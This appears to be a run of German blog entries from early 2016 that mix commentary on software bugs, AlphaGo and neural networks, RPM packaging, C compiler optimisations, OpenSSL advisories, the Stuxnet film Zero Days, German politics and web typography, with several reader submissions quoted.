Update: Zwischenergebnis nach ~100 Einsendungen: Einer (EINER!!) sagt, in seiner Firma gäbe es genug Zeit für das Finden und Fixen von Bugs, und ordentliche Prozesse und gutes Tooling. Das sei alles sehr teuer, und manchmal geht man mit Unschönheiten in Produktion, weil man für ein Redesign keine Zeit mehr hat, aber richtige Bugs sind ihm nicht bekannt. Einer. Alle anderen heulen sich bei mir aus, wie schlimm das alles ist.
Gemeinsame Nenner: Unrealistische Deadlines, kein Budget für Bugfixing zurückgelegt, Management im Vogel-Strauß-Modus, Verkäufer haben unrealistische Zusagen gemacht, bis hin zu so Dingern wie "der Kunde hat noch nicht gezahlt, also machen wir das Produkt nicht heile" und "die Ausschreibung hätten wir nie gekriegt, wenn wir ehrlich gerechnet hätten, und jetzt machen wir nur das, was in unserer Bewerbung drinstand, und da steht nichts von Bugs".
Und die eine oder andere Anekdote, die ich mal sammeln und vielleicht beizeiten veröffentlichen werde. Bei Startups scheint es auch üblich zu sein, dass das ganze Geschäftsmodell so dermaßen superriskant ist, dass das Risiko, das von Bugs ausgeht, im Vergleich zu den anderen inhärenten Risiken förmlich untergehen. So ala "Selbst wenn der Bug morgen platzt und uns die Datenbank korrumpiert, ... ich weiß gerade eh nicht, wovon ich die Gehälter zahlen soll nächsten Monat"
Update: Ein Einsender schreibt, dass sie bei ihm in der Firma auch einen Haufen Bugs vor sich herschieben, und sich dafür der Begriff „Bugwelle“ eingeschliffen hat. HARR HARR, sehr schön!

Sat Mar 12 2016

[l] Ich war vor vielen Jahren bei Microsoft an einem Audit für Windows Vista beteiligt. Wir haben uns damals den Spaß gemacht, die besten Ausreden zu sammeln, die uns so begegnet sind. Das hatte die Form eines Bullshit Bingo-Feldes an einer Tafel. Dann ging uns mehrfach der Platz aus, und weil wir eh alle unter NDA standen, haben wir das auch nicht für die Ewigkeit gedacht sondern nur für uns und nicht auf die Lesbarkeit der Handschrift geachtet. Aber es gibt davon ein Foto, und das hat jetzt unser damaliger Manager auf Microsoft-Seite auf Twitter veröffentlicht, daher kann ich da jetzt öffentlich drüber reden. Schade, dass wir so wenig auf unsere Handschrift geachtet haben. Rückblickend ist das ja schon ein schönes Zeitdokument. Größere Version. Viel davon sind Abkürzungen und Windows-Slang. Oben links z.B., Kerb steht für Kerberos, RODC war das damals frische Konzept eines Read-Only Domain Controllers. Viele davon sind aber echt universell. "we XOR encrypt it", "perf hit" und "The ISP is trusted" z.B.
Wir haben damals schon Dinge angesprochen, die heute noch aktuell sind. Rechts mittig z.B. steht "Use of Windows is consent to talk to Microsoft".
Ah. Gute Zeiten.
[l] Zu meinen KI-Überlegungen kamen ein paar interessante Kommentare rein. Erstens haben mir gleich mehrere Einsender die dicke Kröte zu schlucken gegeben, dass meine Befürchtungen zum Gesundheitssystem schon längst eingetroffen sind:
Ich kann dir als Pharmaziestudent sagen, dass bereits heute JEDES MEDIKAMENT (!!!) von KI in gewissem Maße gemacht wird.
"Drug Design" bzw. die Suche nach Wirkstoffen funktioniert nämlich folgendermaßen:
Zunächst sucht man den Liganden, der an den gewünschten Rezeptor bindet. Da es unglaublich viele Moleküle gibt, muss zunächst am Computer vorausgewählt werden. Diese Programme werden von Bioinformatikern geschrieben, die ausschließlich KI benutzen. Woher ich das weiß? 90% der Programme sind zwar closed source (gehören der Pharmaindustrie), aber die, die es an der Uni gibt, nutzen neuronale Netze (http://www.mrupp.info/publications.html). Erst nachdem es die ersten "hits" gibt bzw. man eine Leitstruktur ausgesucht hat, wird mit rationaleren Methoden weitergearbeitet (z.b. unser Programm). Dies ist aber eigentlich auch nicht so toll, weil z.B. QSAR davon ausgeht, dass wenn wir gleiche Molekülteile haben, diese stets ähnliche Wirkung haben. Dies führt zum "QSAR paradox", das den Sachverhalt beschreibt, dass die Grundannahme nicht stimmt (Contergan! Nein! Doch! Oh!).
Ich denke, dass es hier eine große Marktlücke gibt. Die guten Chemiker, die auch Ahnung von Quantenmechanik haben, arbeiten an Programmen, die kleine Moleküle sehr gut beschreiben/ Eigenschaften vorhersagen.
Die "schlechteren" arbeiten u.a. bei uns in der Synthese und konkurrieren leicht mit den Pharmazeuten.
Die Biophysiker beschäftigen sich mit spektroskopischen Methoden von Biomolekülen. Dies erfolgt rational und es werden auch Fortschritte erzielt.
Die Bioinformatiker sind die einzigen, die sich mit Computermodellen von Proteinen usw. befassen, greifen aber fast ausschließlich auf machine learning zurück. Ich kenne nur eine Ausnahme: http://www.merzgroup.org/
Hier noch ein Einsender, der in eine ähnliche Bresche schlägt:
a couple of thoughts of mine about Google's KI: you did mention neural networks and related things. In medicinal chemistry people have been classifying chemical compounds for 30 years (!) using neural networks. It works extremely well - this one is toxic, that one isn't, this is a Glycoprotein P substrate, that one is not - even in prospective studies. It's impossible to derive any rules from all of these studies but my thought has always been: if it were simple they wouldn't have to resort to neural networks.
You also mentioned healthcare. People are slowly waking up to the realities of systems biology. It really isn't that there are metabolic cycles or feedback loops, biologial reality doesn't look like this at all. What really happens is that there are all sorts of interacting networks of things, some of which may compensate for others. This is how evolution works, after all, though gene duplication and repurposing of enzymes. The whole fabric is already impossible to understand for any human and cannot be turned into a simple model. Hence the very expensive realities of pharmaceutical R&D. There was no reason to expect that COX-2 inhibitors would put those that take it at risk of heart disease, but it is a fact that they do. No idea why.
Dann gab es noch einen schönen Kommentar aus der Sci-Fi-Ecke:
Du sagst im Grunde, dass der Mensch die höchste Intelligenz auf diesem Planeten war und ist, und folgerst, dass er es selbstverständlich auch bleiben sollte. Wir Menschen verwenden einen Gutteil unserer Ressourcen darauf uns zu reproduzieren und das beste aus unserem Nachwuchs zu machen. Wenn wir nun plötzlich in der Lage sind ein System zu erschaffen, das uns intellektuell überflügelt, dann sollten wir vielleicht aufhören uns zu reproduzieren und unsere Ressourcen in die Entwicklung dieses "besseren" Systems stecken. Für mich klingt das nach dem logisch nächsten Schritt in der Evolution. Das Thema ist nur hochgradig angstbesetzt.
und weiter (war eine sehr lange Zuschrift, ich gebe daher aus Platzgründen nur Teile wieder):
In der KI-Forschung ist die Frage der Vorhersagbarkeit solcher Systeme (beider Varianten) natürlich schon ausgiebigst diskutiert worden. Das Ergebnis ist ein interessantes Paper namens "Structural Risk Minimization", das besagt: Je mehr (Lern)Kapazität ein Modell hat, desto höher ist das Risiko, dass es "was falsches" lernt, also einen Generalisierungsfehler macht. Und umgekehrt: Je mehr "widersprüchliche" Daten von einem lernenden System korrekt gelernt werden können sollen, desto höher ist die benötigte Kapazität.
Für diese Kapazität gibt es auch ein Maß, und zwar die sog. VC-Dimension. Die VC-Dimension ist genau die maximale Anzahl an Datenpunkte, für ein Lerner - unabhängig von der Färbung der Datenpunkte - ein Modell (Programm) ausspuckt, das diese Punkte korrekt klassifiziert.
Zurück übertragen auf deine Frage mit der KI-basierten Softwareentwicklung: Da von einer KI derzeit nur Programme entwickelt werden können, die auf endlichen Eingabedaten funktionieren, kann man die so entwickelten Programme auch leicht daraufhin überprüfen, ob sie die Eingabedaten korrekt wiedergeben. Man enthält der KI einfach einen Teil der Eingabedaten vor und prüft anhand derer das resultierende Programm. Wenn die Fehlerquote signifikant über der gemäß VC-Dimension zu erwartenden Fehlerrate liegt, ist das Programm falsch. Und das war's dann auch schon.
Der Ansatz, dass ein Mensch ein von einer KI entwickeltes Programm "semantisch" überprüft, ist nur insoweit zielführend, wie die von der KI entwickelten Programme überhaupt Semantik verarbeiten. Und wenn sie das tun, sind die Ableitungen der Regeln, die diese Programme vornehmen (wie in Prolog) für einen Menschen auch wieder nachvollziehbar.
Dann kam noch dieser Link rein (es geht um genetische Algorithmen im Chipdesign, Ctrl-F baffling für den spannenden Teil)
Und zuletzt weisen einige Einsender darauf hin, dass AlphaGo mitnichten einfach ein neuronales Netz ist, sondern schon auch "normale" Monte-Carlo-Baumsuche verwendet, aber halt unterstützt mit neuronalen Netzen. Einer kommentiert noch:
Ich stelle mir den menschlichen Go-Spieler wie einen Ingenieur vor, der ohne Hilfsmittel arbeitet. Die Google-KI ist dagegen ein Ingenieur, der einen Rechenschieber oder einen Taschenrechner (ein an sich nicht intelligentes, aber schnell und präzise arbeitendes Hilfsmittel) direkt ins Gehirn implantiert hat.
Ein Beispiel ist Zug 108 der ersten Partie gegen Lee Sedol: Dieser Zug ist vielleicht keiner der besonders „komischen Züge“, aber ein menschlicher Spieler hätte diesen Zug niemals gemacht, denn er ist aus seiner Perspektive riskant. Die möglichen Konsequenzen sind komplex und vielfältig, und es ist schwierig abzuschätzen, ob wirklich alle sich ergebenden Varianten für den Spieler von Vorteil sind. Die Google-KI hingegen wirft ihren Monte-Carlo-Taschenrechner an und kann mit hinreichender Sicherheit feststellen, dass dieser Zug eben kein Fehler ist. Auf diese Weise verbindet AlphaGo die „Intuition“ seiner neuronalen Netze mit mehr oder weniger klassischer Vorausberechnung der Züge.
Der „Fehler“ des Menschen, weshalb er verliert, ist also so gesehen, auf die „riskant“ aussehenden, aber in Wahrheit sicheren Züge verzichten zu müssen und statt dessen die offensichtlich sicheren, aber nicht ganz so guten Züge zu spielen.
Ein Einsender hat mir noch Mut zuzusprechen versucht, indem er Parallelen zur Mechanik zieht.
Früher hat man mechanische Bauteile -z.B. Schubstangen oder Pleuel- nach Erfahrung ausgelegt. Später kam ein mathematisches Modell zur Beschreibung der Bauteile (Eulersche Knickfälle). Noch sehr viel später hat man dann das Modell nach innen gelegt (kleine Gitterzellen FEM) und mit den Ergebnissen daraus das äussere Modell daran angepasst.
Wir können immer noch nicht sagen, warum dieses eine Pleuel genau an dieser Stelle geknickt/gebrochen ist. Wir können nur sagen, dass es mit hoher Wahrscheinlichkeit an dieser Stelle wegen diesem Lunker, dieser Kerbwirkung, dieser Resonanz versagt hat (insbesondere bei Resonanzen bin ich mir sicher, dass das nur ca 1/5 der Ingenieure versteht, bei Torsionsresonanzen nochmal die Hälfte weniger).
Wir können es beschreiben, und seit einiger Zeit so gut, dass es fast keine weiteren Forschungsgelder mehr für Mechanik gibt, weil nichts grundlegend neueres erwartet wird.
und zur Frage der Debugbarkeit meint er, das ginge bei Mechanik ja auch nicht. Da kann man das Teil nur anders auslegen und neu bauen.
[l] Googles KI führt jetzt 3-0 in ihrem 5-Partien-Go-Match gegen den menschlichen Großmeister.
Ich habe nicht viel Ahnung von Go, aber ich habe mir mal ein paar Kommentare durchgelesen. Und mein Eindruck ist, dass wir gerade eine Zeitenwende erleben.
Bei Schach war das so, dass die Computer halt mehr Stellungen voraus probieren konnten, und sie haben gewonnen, weil die Menschen Fehler gemacht haben. Kommentatoren haben sich das angeguckt und konnten auf den Zug zeigen und sagen: Das war ein Fehler. Das hat dich die Partie gekostet.
Aber bei Go gerade ist das anders. Die KI hat eine bessere Bewertungsfunktion als wir Menschen gefunden. Die Kommentatoren gucken sich die Parteien an und verstehen nicht, wieso die KI gewonnen hat. Der Mensch hat doch genau richtig gespielt! Der hat alles richtig gemacht, und dann hat die KI diesen komischen Zug hier gemacht, und dann hat der Mensch plötzlich verloren.
So, glaube ich, fühlt sich so ein Sci-Fi-Szenario an, in dem eine überlegene außerirdische Intelligenz die Erde angreift, und wir sind nicht schlau genug, ihre Strategie zu verstehen. Wir sehen, was sie tut, aber wir verstehen es nicht.
Das ist übrigens auch der Grund, wieso ich neuronale Netze und KI nie eine gute Forschungsrichtung fand. Wenn man so eine Software trainiert, und sie tut dann Dinge, dann kann man nicht daraus lernen, was sie genau gelernt hat, und das dann auch so tun. Man kann nur daneben sitzen und vielleicht einzelne Perzeptronen oder so beobachten, und sich sozusagen am Feuerwerk erfreuen, aber verstehen, was da passiert, und warum es passiert, das geht halt nicht. Fehler debuggen geht auch nicht. Man kann nur mehr oder neu trainieren.
Und jetzt haben wir den Salat. Glücklicherweise „nur“ bei Go. Bei Go halte ich uns Menschen für grundsätzlich in der Lage, durch Beobachtung und Gehirnschmalz herauszuforschen, wieso wir gerade deklassiert wurden. Aber der Weg ist sehr gefährlich, den wir da gehen.
Man stelle sich mal vor, überlegene KI wird sagen wir mal im Gesundheitssystem eingesetzt, tut 15 mysteriöse Schritte und heilt damit Patienten. Und hat dann Nebenwirkungen, und wir verstehen gar nicht die Herleitung.
Oder noch schlimmer (und das halte ich für eine sehr reale Gefahr): KI entwickelt eines Tages Software. Wir haben schon Probleme, von Menschen geschriebene Software später zu verstehen und zu warten. Man stelle sich mal vor, die Software tut Dinge, die keiner erklären kann, weil die von einer KI geschrieben wurde.
Und das übelste an dem Gedankengang: Wir haben diese Art von Problem jetzt schon, ganz ohne KI. Völlig ohne Not.
Wir sind halt doof, so als Spezies.
Update: Wobei, „auch so tun“ kann man schon. Das war falsch ausgedrückt. Aber verbessern kann man halt nicht. Eingreifen. Kontrolle hat man nicht mehr. Das ist wie ein Vergleich von Ingenieur und Kindergärtner. Man baut nichts mehr, sondern man erzieht eine KI. Wenn die dann das richtige tut — gut. Wenn nicht, dann hat man halt Pech.

Fri Mar 11 2016

[l] Ich habe ja noch nie Redhat oder Fedora oder Centos oder überhaupt irgendwas mit rpm produktiv eingesetzt, will jetzt aber ein RPM erzeugen und zerschelle gerade an dem Zustand dieser RPM-Infrastruktur. Das ist ja so dermaßen eine Zumutung, mir fehlen echt die Worte. Wie kann jemand auf dieser Basis eine Distribution aufbauen!?
Erstmal gibt es von RPM direkt zwei Stränge, RPM 4 und RPM 5, und beide behaupten von sich, das "offizielle" RPM zu sein. Lolwut?
Gut, hole ich mir RPM 4, weil das auf der Zieldistro eingesetzt wird. Kompiliert nicht. Will NSPR und NSS haben, aber guckt nicht in den Default-Install-Pfaden, konsultiert nicht nspr-config, was genau dafür da ist, und fragt nicht pkg-config, was auch genau dafür da ist. Nein. Und findet es dann natürlich nicht.
OK, überschreibe ich $CC, findet er das. Und findet dann Berkeley DB nicht. Berkeley DB? Srsly? Ist systemweit installiert. Klar, könnte man nehmen. Will man aber nicht. Nein, RPM will die Sourcen in seinem Quell-Tree haben und dann neu bauen. Gut, lege ich ihm das hin.
Stellt sich raus: Einfach ein RPM zu den anderen RPMs auf dem Install-ISO tun reicht nicht. Nein. Man muss da auch "repodata" neu erzeugen. Und das kann RPM nicht.
Natürlich nicht! Warum auch?
Dafür braucht man ein externes Tool namens createrepo. Das ist in Python.
Da gehen ja bei mir direkt alle Warnlampen an.
Installiere ich das also. Rufe es auf. Geht nicht. Braucht yum. Auch ein Python-Tool. Die zweite Riege Warnlampen geht an. Installiere ich also yum. Rufe es auf. Geht nicht. Braucht das rpm-Modul. Wie, ist das nicht bei RPM dabei?
Doch, ist es. Aber RPM installiert das nicht, außer man bittet explizit darum.
Also nochmal RPM gebaut. Rufe yum auf. Geht nicht. "No module named sqlitecachec". Oh super! Wo kriegt man das her? Steht da nicht. Warum würde das da auch irgendwo stehen? Ist ja nicht so, als wäre das hier alles die zentrale Software, auf der eine "Enterprise"-Distribution aufsetzt! Warum sollte das einfach so funktionieren?
Googelt man das also, findet keine Homepage. Nee, warum auch. Man findet diverse Distro-Pakete. Oh, das kommt von "yum-metadata-parser"! Na da hätte man ja auch direkt selber drauf kommen können!1!! 2010 zuletzt angefasst.
yum geht. createrepo immer noch nicht. Braucht "deltarpm". Sagt mal, soll das hier ein Scherz sein? Sogar der Rotz von Gnome prüft vor dem Bauen, ob die Abhängigkeiten erfüllt sind!
Oh und wer hat sich denn bitte das RPM-Dateiformat ausgedacht?! Was soll das werden? Soll das außerirdische Invasoren in den Wahnsinn treiben, damit sie nicht die Menschheit ausrotten können? Heilige Scheiße. Dagegen ist ja der Debian-Kram einleuchtend und selbsterklärend! Und selbstdokumentierend gar. Wie ein .deb funktioniert, kann man mit file und Hausmitteln rausfinden, man braucht nicht mal einen Hex-Editor.
Meine Güte. Und ich kenne ansonsten durchaus zurechnungsfähige Leute, die schwören auf CentOS!
Update: Vielleicht sollte ich mal sagen, wie ich mir so ein Paketverwaltungstool vorstelle. Meine Anforderung wäre, dass das immer funktioniert. Python zerschossen? Perl nicht installiert? glibc-Update in der Mitte fehlgeschlagen? Der Paketmanager muss noch gehen und das noch retten können. Und er muss klein genug sein, um mit Metadaten in 5 MB zu passen. Muss auch ohne OpenSSL und curl und wget arbeiten können, zumindest im Notfall. Von den Systemen, die ich bisher gesehen habe, gefällt mir pacman (Arch-Linux) am besten. Aber da geht noch was.
Update: Erwähnte ich, dass repodata dann XML und Sqlite ist? Geht's noch? Wieso habe ich dann Berkeley DB in RPM reinlinken müssen? Oh und wenn mir der Distro-Installer während der Installation Werbung anzeigt, habe ich da überhaupt kein Verständnis für.
Update: Wobei mir die Übung ja wenigsten eine Sache klar gemacht hat. Jetzt verstehe ich, wieso überall diese Cloud-Spezial-Distros aus dem Boden sprießen. Das "Minimal"-Redhat ist 1GB groß nur für Code. Und da ist dann kein netstat bei.

Tue Mar 8 2016

[l] Ich verstehe ja nicht, wo die Überraschung herkommt, wenn die AfD jetzt abräumt.
Wundert das ernsthaft irgendjemanden?
Wir als Gesellschaft hatten denen und ihren Parolen doch nichts entgegen zu setzen außer Ausgrenzung und Zeigefinger. Von Merkel gab es dazu Durchhalteparolen.
Und je heftiger die Ausgrenzungsversuche laufen, desto klarer ist für den Wähler, dass er mit der AfD richtig liegt, wenn er den "Volksparteien" den Stinkefinger zeigen will.
Und gleichzeitig ist die Wahlbeteiligung auf einem anhaltenden Abwärtstrend. Die AfD braucht gar nicht so viele Stimmen, wie die Werte suggerieren. Die muss bloß da sein und zur Wahl stehen, während der Merkel und dem Gabriel die Wähler wegrennen.
Es ist nicht die AfD, die irgendwas richtig macht. Im Gegenteil. Die machen so gut wie alles falsch. Oder kann von euch jemand spontan sagen, wie deren Position zu erneuerbaren Energien ist? Wie sie das Gesundheitssystem reparieren wollen? Wie sie das Hartz-IV-System retten wollen? Was sagt die AfD zu Softwarepatenten? Seht ihr? Die AfD ist die deutsche Version von Donald Trump. Niemand wählt die, weil die irgendwas besser machen würden. Die Wähler wollen bloß die Merkel weghaben, und die SPD hat sich so fest im Arsch der CDU verkeilt, dass die ja quasi öffentlich angesagt haben, sie wollen nicht gegen die CDU zur Wahl stehen, sondern nur mit der CDU weiterregieren.
Die Grünen scheitern gerade an dem Beck, und die Linken haben es vollständig verkackt, aus der Dauer-Krise politisches Kapital zu schlagen. Bleibt ja nur die AfD.
Und wisst ihr was? Solange sich das schön verteilt, und keiner durchregieren kann, soll es mir recht sein. Am liebsten wäre mir eine Minderheitenregierung, die dann keine Gesetze durchkriegt. Bisher hat es ja jede neue Regierung nur noch schlimmer gemacht. Ich würde mir ein paar Jahre Belgien wünschen. Totale politische Paralyse.

Thu Mar 3 2016

[l] Ich habe mich hier und im gcc Bugtracking-System schon länglich darüber aufgeregt, dass C-Compiler angefangen haben, "Optimierungen" auf Basis von strikter Auslegung des Standards zu machen. C hat diverse Dinge nicht klar spezifiziert, unter anderem damit man C auch auf esoterischen Architekturen implementieren kann, und damit Compiler-Autoren mehr Freiheit haben, wie sie Dinge implementieren wollen.
Insofern könnte man argumentieren, dass die Compiler-Leute ja in gewissem Sinne genau das tun. Aber sie haben es halt so gemacht, dass vorher funktionierende Programme plötzlich zu funktionieren aufgehört haben. Und das auch noch an Stellen, an denen der Code für das Verhindern von Sicherheitslücken da war; da haben die Compiler dann angefangen, die Sicherheitschecks wegzumachen.
Zu meiner Überraschung sind die Rants teilweise angekommen, und die aktuellen Versionen von gcc und clang sind weniger aggressiv als frühere Versionen, aber die Büchse der Pandora ist jetzt halt offen, und es ist nicht wirklich absehbar, wie sich das langfristig entwickeln soll.
Ich erzähle das alles, weil ich gerade dieses schöne Paper zu dem Thema gefunden habe, von den Leuten hinter GNU Forth, die schön beschreiben, dass man beispielsweise eine Funktion wie memmove (seit ewigen Zeiten Teil des C-Standards) nicht in C implementieren kann, ohne formaljuristisch gesehen undefiniertes Verhalten zu erzeugen. Daher: Klare Leseempfehlung!

Tue Mar 1 2016

[l] Das OpenSSL-Advisory ist draußen. Und ist wie erwartet alles total harmlos.
Double free (auch bekannt als remote code execution). Severity low. Ja nee, klar.
Oh hier, noch einer. Memory Corruption. Auch bekannt als remote code execution. Severity low.
Phew, und ich habe mir schon richtig Sorgen gemacht!
Oh, und … das hier. Aber das betrifft euch bestimmt nicht, denn ihr habt bestimmt SSL2 deaktiviert. Habt ihr doch, oder? ODER?

Sat Feb 27 2016

[l] Wo wir gerade bei Trendbeobachtung sind: Ich habe ja eine libc für Linux gehackt, die für statisch linken verantwortlich ist. Früher haben wir alle statisch gelinkt. xterm war ein paar MB groß und die Leute waren unzufrieden. Dann haben wir alle dynamisch gelinkt, und gemerkt, dass wir uns damit eine Abhängigkeitshölle eintreten. Und jetzt shippen die Leute Docker-Images und virtualisieren und in den Paketen ist jeweils die dynamische libc einzeln drin. Am Ende haben wir die Nachteile von dynamischem Linken ohne die Vorteile, weil jetzt pro Paket eine andere libc gemappt ist, nicht nur eine pro System.
Völlig gaga. So langsam frage ich mich, wieso die Leute dann überhaupt noch dynamisch linken.

Fri Feb 19 2016

[l] Ich habe mir heute im Kino Zero Days angeguckt, den Film hier. Im Wesentlichen sieht man eine Stunde lang alte weiße Männer süffisant in die Kamera grinsen, und sagen, dass sie dazu nichts sagen können. Aber dazwischen sind durchaus sehenswerte Teile, unter anderem haben sie da einen NSA-Whistleblower aus TAO (deren Hacking-Abteilung).
Der/die (wird im Film von einer Schauspielerin nachgesprochen) erregt sich fürchterlich, dass der wunderschöne, subtile, zuverlässige Code der NSA von den Trampeln aus Israel so unilateral verteilt wurde, und dass es jetzt so aussieht, als ob die NSA nicht in der Lage sei, eine Cyberwar-Operation durchzuführen, ohne dabei aufzufliegen.
Ein lustiges Detail war noch, dass die den Zentrifugen-Kaputtmach-Code ja testen mussten, und dafür haben sie die Uranzentrifugen genommen, die ihnen der Gaddafi nach dem Zusammenbruch Libyens überlassen hat. Harr harr harr :-)
An dieser Stelle herzlichen Dank an den edlen Ticket-Spender, der an mich dachte, als ihm terminlich was dazwischenkam!
Update: Ein paar Details noch. Die Infektion war nicht bloß ein "wir gehen hin und machen kaputt" sondern dauerte Monate bis Jahre an. Es gab da ein halbes Dutzend Versionen von Stuxnet, die die Amis immer über Agenten manuell in Natanz aufgespielt haben. Und über die zweiwöchentlich (!) stattfindenden Inspektionen der IAEA haben sie dann live gesehen, wie viel Schaden sie gemacht hatten.
Der Code hat erstmal 13 Tage gewartet und eine Baseline an Messdaten etabliert. Denn es dauert so 13 Tage, bis eine frische Uranbefüllung durch die Kaskade durchgesuppt ist und alle Zentrifugen befüllt sind. Dann hat der Code die aufgezeichneten Daten rausgeliefert, damit die Konsole "alles OK" anzeigt, und hat dann die Zentrifugen zerstört. Die Iraner haben wohl auch reihenweise Mitarbeiter gefeuert, weil sie dachten, das sei Pfusch bei der Konstruktion gewesen.
Israel hat dann darauf bestanden, dass es auch einen Cyber-Infektionsvektor gibt und da den 0day-Kram rangepappt und die Samples in den fünf wichtigsten Zulieferer-Buden ausgesetzt. Deren Techies haben das dann zu Natanz gebracht. Lustigerweise hatte der Code ein Log der infizierten Rechner drin, und anhand der Logs konnte man die ganzen Samples aus der freien Wildbahn auf diese fünf Zulieferer im Iran zurückverfolgen.

Thu Feb 18 2016

[l] Ratet doch mal, wie häufig Apple bereits auf Zuruf der Regierung Telefone ihrer Kunden aufgemacht hat!

Tue Feb 16 2016

[l] Ein neuer Film namens Zero Days über Stuxnet hat einige interessante neue Details. Erstens war Stuxnet nur ein kleiner Teil eines massiven Hack-Programms namens NITRO ZEUS, mit dem die Amis die zivile Infrastruktur des Iran komplett unterwandern und auf Zuruf abschalten können wollten. Zweitens wurde es von den Amis mit Detailwissen über den Iran der GCHQ entwickelt, und dann den Israelis gegeben, die es dann nochmal angepasst haben. Deren Anpassung hat Stuxnet wohl deutlich aggressiver gemacht, und angeblich hat Israel dann ohne Rücksprach mit Amis oder Briten ihre Rottweiler-Version aktiviert und damit überhaupt erst dafür gesorgt, dass Stuxnet auf irgendwelchen anderen Rechnern gefunden und analysiert werden konnte.

Mon Feb 15 2016

[l] Die fiesen Flüchtlings-Einwanderer-Sozialbetrüger werden aber auch immer jünger! Es handelt sich um die zweijährige Tochter einer Familie aus Albanien. Ausgewiesen werden soll aber nicht der Rest der Famlie, weil die nachweisen können, dass ihnen in Albanien Verfolgung droht. Das Kind ist aber in Deutschland geboren und kann daher keine Verfolgung in Albanien nachweisen.
Lacht nicht! Steht da so!
Die Ausreise-Aufforderung richtet sich allein gegen Edona, weil sie im Gegensatz zum Rest ihrer Familie keine Verfolgung in Albanien nachweisen kann: „Eine konkret drohende individuelle und begründete Furcht vor Verfolgung wurde für die Antragstellerin nicht geltend gemacht. Eine erlittene Vorverfolgung kann angesichts der Tatsache, dass die Antragstellerin im Bundesgebiet geboren wurde und sich zu keiner Zeit in Albanien aufgehalten hat, nicht vorliegen“, wie das Bundesamt unter Aktenzeichen 5767139-121 schreibt.
Höchste Zeit, dass wir sie nach Albanien schicken. Wenn sie dann dort verfolgt wird, kann sie ja zurück flüchten!
Update: Spon über den Fall. Kinder werden nicht einzeln abgeschoben. (Danke, Christian)

Fri Feb 12 2016

[l] Hier hat mal jemand eine hilfreiche Übersicht über Malware-SSL-Zertifikate gemacht. Was man sich so einfängt, wenn man sich SSL-Abfang-Malware auf download.com und co einfängt.
[l] Oha, jetzt geht es ans Eingemachte: Die Clinton Foundation hat einen Brief von der Staatsanwaltschaft gekriegt, muss jetzt ihre Innereien offenlegen. Das könnte für eine Menge Leute sehr peinlich werden jetzt, wenn die Gerüchte mit den Spenden aus dem Ausland stimmen. Wobei es in der Subpoena eigentlich gar nicht um die Foundation oder Hillary geht sondern um eine Mitarbeiterin. Was da genau das Problem ist, ist ein bisschen unklar. Ob es um die classfied E-Mails geht?
[l] Ich habe ein bisschen Feedback zu dem Typographie-Problem gekriegt.
Erstmal: Mir war nicht bewusst, wie viele Leute in ihrem Browser routinemäßig Ctrl-+ bzw Ctrl-Mausrad verwenden, um die Schriftgröße anzupassen. Das klappt mit meinem Ansatz nicht mehr, weil ich die Schriftgröße in Relation zur Browserbreite setze. Wenn man da zoomt, dann tut sich nichts. Das ist ja gerade die Idee.
Mehrere Leser haben sich beschwert, dass die Schrift jetzt zu groß ist. Diese Leser haben, soweit ich das sehen kann, alle ihren Browser im Fullscreen-Modus am Laufen. Ich habe meinen Browser ab 1920x1080 immer ungefähr halb so breit wie den Bildschirm, bei weniger Auflösung anteilig mehr als die Hälfte.
Und in der Tat, wenn man Fullscreen macht, dann ist die Schrift "zu groß". Allerdings — kommt drauf an. Wenn man Fullscreen macht, weil man die Seite auf einem Projektor anzeigen will, und die Leute sollen hinten noch was erkennen können, dann ist sie nicht zu groß. Insofern funktioniert es schon ein bisschen wie gedacht.
Die Frage ist, wie ich im CSS zwischen "Browserfenster ist Full HD, Display ist 4k" und "Browserfenster ist Full HD, Display auch" unterscheiden kann. Oder vielleicht sollte ich das gar nicht unterscheiden und hoffen, dass der Browser den DPI-Wert ordentlich auslesen kann?
Hier sind noch einige interessante Tipps eingegangen, wie ich das anders machen kann. Die werde ich dann mal durchprobieren.
Von den Schriften her ging hier noch mehrfach der Hinweis auf Fira ein, eine sehr schöne Schriftfamilie von der Typographen-Legende Erik Spiekermann. Fira ist für das Mozilla-Projekt entstanden und u.a. hier herunterladbar ist. Fira ist in der Tat eine sehr schöne Schriftart, die ich aber bisher nur in Überschriften ausprobiert habe, nicht für den Fließtext.
Update: Vielleicht sollte ich mal konkret fragen: Was ist eigentlich das gewünschte Ziel für Fullscreen-Browsen auf einem 16:9 oder 16:10-Bildschirm? Wenn die Typographie-Richtlinien sagen, dass Zeilen nicht zu lang sein sollen, bleibt ja nur a) riesige Schrift oder b) riesige sinnlose Ränder. Seit ich den 4k-Monitor habe, ärgere ich mich über sinnlose Ränder im Web, daher hab ich in meinem ersten Ansatz halt die Schrift größer gemacht.
In meinem Weltbild geht man nur in den Fullscreen-Modus, wenn man a) ein Video gucken will oder b) jemandem im Zimmer was zeigen will oder c) mit einem Projektor arbeitet und anderen was zeigen will. Insofern ist das durchaus so gedacht gewesen, dass im Fullscreen-Modus die Schrift eher an Vortragsfolien als an Fließtext erinnert von der Größe her. Der Punkt war ja gerade, dass man nicht nachjustieren muss. Daher jetzt mal an die Fullscreen-Leser: Was ist denn eure Erwartungshaltung gewesen? Dass der Text eine dünne Kolumne von 25% oder weniger eurer Bildschirmfläche füllt und ihr dann immer mit Ctrl-Scrollrad nachjustiert?

Thu Feb 11 2016

[l] Hier geht noch eine Mail eines der Autoren des OpenSSL-Audits ein, und die verdient ihren eigenen Blogeintrag:
Zur Klärung einiger Punkte, die vielleicht von dem Report nicht so ersichtlich sind…
Da es praktisch unmöglich ist, den ganzen OpenSSL-Code durchzublicken und zu evaluieren, waren im Scope der Analyse vor allem folgende Punkte:
- OpenSSL server
- TLS 1.2
- Verifikation der Gegenmaßnahmen der bekannten Angriffe (Identifikation des relevanten Codes war im Scope)
- kryptografische Angriffe
Alle Analysen und Algorithmen sollten nachvollzogen werden.
Vor allem wegen dem dritten Punkt kann ein Eindruck entstehen, dass nichts neues gemacht wurde (ja, wir haben z.b. Heartbleed, EarlyCCS nachgeprüft und es tut mir leid, wenn es dir nicht gefällt). In der Studie waren aber andere Angriffe, die vorher nicht konkret auf OpenSSL evaluiert wurden, ich nenne nur ein paar Beispiele:
- Bleichenbacher Angriff: da sind wir konkret noch tiefer auf die Angriffe eingegangen, als in unserem USENIX Paper (Link).
- DH-Kleine Untergruppen: es sind mir keine öffentlichen Dokumente bekannt, wo die Angriffe auf die letzten OpenSSL-Versionen besprochen wären.
